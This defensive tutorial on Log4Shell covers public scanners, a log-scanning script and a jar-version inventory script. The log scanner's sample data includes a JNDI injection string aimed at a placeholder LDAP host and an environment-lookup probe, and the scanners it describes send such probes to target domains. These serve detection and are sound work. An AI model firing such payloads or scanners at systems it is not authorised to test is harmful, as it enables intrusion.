
What Is Log4Shell and How to Protect Your Linux System Against It

The Log4Shell (CVE-2021-44228) vulnerability is described by many cybersecurity researchers and experts as the most critical zero-day vulnerability of all time. It affects a widely used Java utility called Log4j, which has been around since 2001 for logging and reporting events such as routine system operations and software errors. Here we show you how to protect your Linux system against it.



How Does the Log4Shell Vulnerability Work?

On a fundamental level, the vulnerability is caused by improper input validation. This happens when software doesn't properly validate the data it receives; incorrectly validated input can then be used to make the program perform actions it is not supposed to.

Log4Shell specifically takes advantage of the requests Log4j makes to external servers through JNDI and LDAP when it resolves lookups found in logged messages. By abusing these requests, an attacker can execute code on any vulnerable system, which can lead to a malicious actor taking complete control of it and gaining the ability to install ransomware or steal data.
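Because the attack hinges on Log4j resolving lookup syntax inside text that an outside party controls, the defender's first detection is simply to look for that syntax in client-supplied fields that end up in logs (User-Agent, request path, query string). The following scanner is an added example written for this article, not code from the original page or from any of the tools it describes; it runs over a few constructed access-log lines and flags any `${...}` lookup in a request, with `${jndi:` treated as the highest severity. Flagging the generic lookup syntax, rather than only the literal `jndi` string, is deliberate: obfuscated variants still need the `${` opener, so the generic rule catches them without enumerating them.

```python
import re

# Constructed sample access-log lines for demonstration (not real traffic).
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:13:22:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:13:22:07 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://example.invalid/a}"',
    '203.0.113.4 - - [10/Dec/2021:13:22:11 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 612 "-" "curl/7.79"',
    '203.0.113.7 - - [10/Dec/2021:13:22:15 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

# Any "${" is Log4j lookup syntax and never legitimate in a client-controlled field.
LOOKUP_OPENER = "${"
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def classify_line(line):
    """Return 'jndi' for a direct JNDI lookup, 'lookup' for any other lookup
    syntax in the request, or None when the line looks clean."""
    if JNDI_LOOKUP.search(line):
        return "jndi"
    if LOOKUP_OPENER in line:
        return "lookup"
    return None


def scan_log(lines):
    """Yield (line_number, severity, line) for every suspicious line."""
    findings = []
    for number, line in enumerate(lines, start=1):
        severity = classify_line(line)
        if severity is not None:
            findings.append((number, severity, line))
    return findings


if __name__ == "__main__":
    # Stand-alone usage over the constructed sample; pass a real log via stdin instead.
    for number, severity, line in scan_log(SAMPLE_LOG_LINES):
        print(f"line {number}: {severity.upper()} -> {line}")
```

In practice you would feed the function the access log of the Java application itself (or of a reverse proxy in front of it), since Log4j only evaluates lookups in strings that the application actually logs; a hit is an attempted exploitation and should trigger a check of the Log4j version in use.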

What Does Log4Shell Affect?

Since Java is an extremely popular programming language, a great deal of software written in Java that uses Log4j for its logging is affected by this vulnerability. Some of the most well-known and commonly used software affected by it includes Apache and the video game Minecraft.


How to Know Which Software Is Affected?

Log4Shell, like any other cybersecurity vulnerability, is mitigated by patching the software affected by it. However, the case of Log4Shell is somewhat unusual, since it affects such a wide range of software, and it can be difficult to keep track of what is affected and what isn't.

Luckily, the National Cyber Security Centre of the Netherlands has published a comprehensive list on GitHub that covers software developed by many different organizations and states whether each is vulnerable to Log4Shell.

How to Scan Your Apache Server for the Vulnerability

Since this vulnerability has greatly affected the cybersecurity and software communities, it is no surprise that there are tools available for administrators to scan their servers for the vulnerability.

One such scanner is Log4j-RCE-Scanner, which lets you scan multiple addresses for the Apache Log4j remote command execution vulnerability.


Installing Log4j-RCE-Scanner

Before we start, we need to install its dependencies, httpx and curl.

curl can be easily installed on Ubuntu and Debian-based systems using the apt command:

sudo apt install curl

The same can be done on Arch Linux using the pacman command:

sudo pacman -Sy curl

And on CentOS and Fedora installations using the yum command:

sudo yum install curl

httpx is written in Go, so with a Go toolchain installed it can be built and installed with the following commands:

git clone https://github.com/projectdiscovery/httpx
cd httpx/cmd/httpx && go build .
sudo mv httpx /usr/local/bin/

After installing all of the necessary dependencies, clone the Log4j-RCE-Scanner repository:

git clone https://github.com/adilsoybali/Log4j-RCE-Scanner

Access the newly created directory:

cd Log4j-RCE-Scanner/

Finally, add the necessary executable permissions for the Bash script:

chmod +x log4j-rce-scanner.sh


Using Log4j-RCE-Scanner

After you have installed the scanner, you can finally get to the fun part of actually using it.

Read the script’s help section by typing:

bash log4j-rce-scanner.sh -h

Now you can scan your Apache server for the Log4Shell vulnerability:

bash log4j-rce-scanner.sh -d [domain] -b [Burp collaborator]

Specify your domain and your Burp Collaborator address with the -d and -b flags. If your domain is vulnerable, DNS callbacks containing the vulnerable domain name are sent to the Burp Collaborator.

Alternatively, the -l flag can be used to specify a file containing a list of domains.


Installing and Using a Python-Based Scanner

If you prefer to use a Python script instead, you can use log4j-scanner, developed by the Cybersecurity and Infrastructure Security Agency (CISA) of the United States.

To install it:

git clone https://github.com/cisagov/log4j-scanner/

Access the directory:

cd log4j-scanner/log4-scanner/

You can install the required dependencies using the Python-based pip3 command:

pip3 install -r requirements.txt

You can view the help provided by the script using the -h flag:

python3 log4j-scan.py -h

Scanning a single URL is simple and can be done using the -u flag:

python3 log4j-scan.py -u example.com

You can also scan a list of URLs by using the -l flag:

python3 log4j-scan.py -l list.txt


How to Patch Apache

To combat this vulnerability, it is extremely important to keep your Apache installation up to date.

You can check the version of Apache in several ways: from an administration panel such as cPanel or WebHost Manager, or by running the httpd command with the -v flag:

httpd -v

Apache can be updated to the latest, most secure version using the apt command on Debian and Ubuntu systems:

sudo apt update && sudo apt upgrade apache2

The same result is achieved with the yum command on CentOS:

sudo yum install httpd


Frequently Asked Questions

1. Which versions of Log4j are affected by the vulnerability?

Versions below 2.17.1 are vulnerable to the exploit. Version 2.15.0 fixed the most easily exploitable elements, and 2.17.1 fixed a difficult-to-exploit remote code execution vulnerability.
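The remote scanners above only tell you whether a service answered a probe; the question raised in "How to Know Which Software Is Affected?" and in this FAQ is answered more reliably on the host itself, by finding every copy of log4j-core on disk and comparing its version against the 2.15.0 and 2.17.1 boundaries given here. The script below is an added example written for this article, not code from the original page or from any Apache or CISA project. It assumes a directory tree to walk (it builds a constructed tree of dummy jars when run with no argument), reads the version from the jar's MANIFEST.MF with a fall-back to the file name, and goes one step beyond the text by also reporting whether the jar still contains the JndiLookup class, which is the component that performs the lookup. The 2.3.x and 2.12.x back-port branches are not special-cased, and jars nested inside WAR or EAR archives are not opened.

```python
import re
import sys
import tempfile
import zipfile
from pathlib import Path

# Version boundaries as given in the article's FAQ (2.x line only).
FIRST_FIX = (2, 15, 0)   # closed the original JNDI lookup RCE
FULL_FIX = (2, 17, 1)    # closed the later, harder-to-exploit RCE

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_PREFIX = "org/apache/logging/log4j/core/"
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def version_from_manifest(zf):
    """Read Implementation-Version from META-INF/MANIFEST.MF, or None."""
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() == "implementation-version":
            match = VERSION_RE.search(value)
            return tuple(int(x) for x in match.groups()) if match else None
    return None


def inspect_jar(path):
    """Return (version, has_jndi_lookup) for a log4j-core jar, else None."""
    try:
        with zipfile.ZipFile(path) as zf:
            names = set(zf.namelist())
            if not any(name.startswith(CORE_PREFIX) for name in names):
                return None                      # not log4j-core at all
            version = version_from_manifest(zf)
            if version is None:                  # fall back to the file name
                match = VERSION_RE.search(path.name)
                version = tuple(int(x) for x in match.groups()) if match else None
            return version, JNDI_CLASS in names
    except (zipfile.BadZipFile, OSError):
        return None


def classify(version):
    """Map a (major, minor, patch) tuple onto the article's FAQ categories."""
    if version is None:
        return "unknown"
    if version[0] != 2:
        return "not-2.x"          # 1.x is outside the scope of this check
    if version < FIRST_FIX:
        return "vulnerable"
    if version < FULL_FIX:
        return "partially-fixed"
    return "fixed"


def scan_tree(root):
    """Walk a directory and report every log4j-core jar found under it."""
    root = Path(root)
    findings = []
    for jar in sorted(root.rglob("*.jar")):
        info = inspect_jar(jar)
        if info is not None:
            version, has_jndi = info
            findings.append((str(jar.relative_to(root)), version, classify(version), has_jndi))
    return findings


def build_sample_tree(root):
    """Constructed dummy jars for demonstration (not real Log4j artefacts)."""
    root = Path(root)
    samples = {  # relative path: (manifest version, is log4j-core, keeps JndiLookup)
        "app1/lib/log4j-core-2.14.1.jar": ("2.14.1", True, True),
        "app2/WEB-INF/lib/log4j-core-2.16.0.jar": ("2.16.0", True, False),
        "app3/lib/logging.jar": ("2.17.1", True, True),       # version only in manifest
        "app3/lib/commons-io-2.11.0.jar": ("2.11.0", False, False),  # unrelated jar
    }
    for rel, (version, is_log4j, keep_jndi) in samples.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        with zipfile.ZipFile(path, "w") as zf:
            zf.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
            if is_log4j:
                zf.writestr(CORE_PREFIX + "Logger.class", b"")
                if keep_jndi:
                    zf.writestr(JNDI_CLASS, b"")
            else:
                zf.writestr("org/apache/commons/io/IOUtils.class", b"")
    return root


def demo():
    """Build the constructed tree in a temporary directory and scan it."""
    return scan_tree(build_sample_tree(tempfile.mkdtemp()))


if __name__ == "__main__":
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for rel, version, status, has_jndi in results:
        shown = ".".join(map(str, version)) if version else "?"
        print(f"{status:16} {shown:8} JndiLookup={'yes' if has_jndi else 'no':3} {rel}")
```

Run it as `python3 log4j-inventory.py /` (or any narrower root such as /opt or /var/lib) to inventory a host; any line reported as vulnerable or partially-fixed is a jar to upgrade through the vendor of the application that ships it, since replacing a jar by hand is easily undone by the next application update.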

2. Do I need the Burp Collaborator utility to receive DNS callbacks with vulnerable domain names?

According to the developer of the Bash-based scanner, Burp Collaborator is used alongside the script itself to receive the DNS callbacks with vulnerable domain names. Alternatively, an Interact.sh address can be used.

3. Do I need other dependencies to use the Bash-based scanner?

For basic usage, you only need httpx and curl installed on your system as dependencies. However, to unlock some functionality you will also need Subfinder, Assetfinder, and Amass installed.


Severi Turusenaho

Technical Writer – Linux & Cybersecurity.
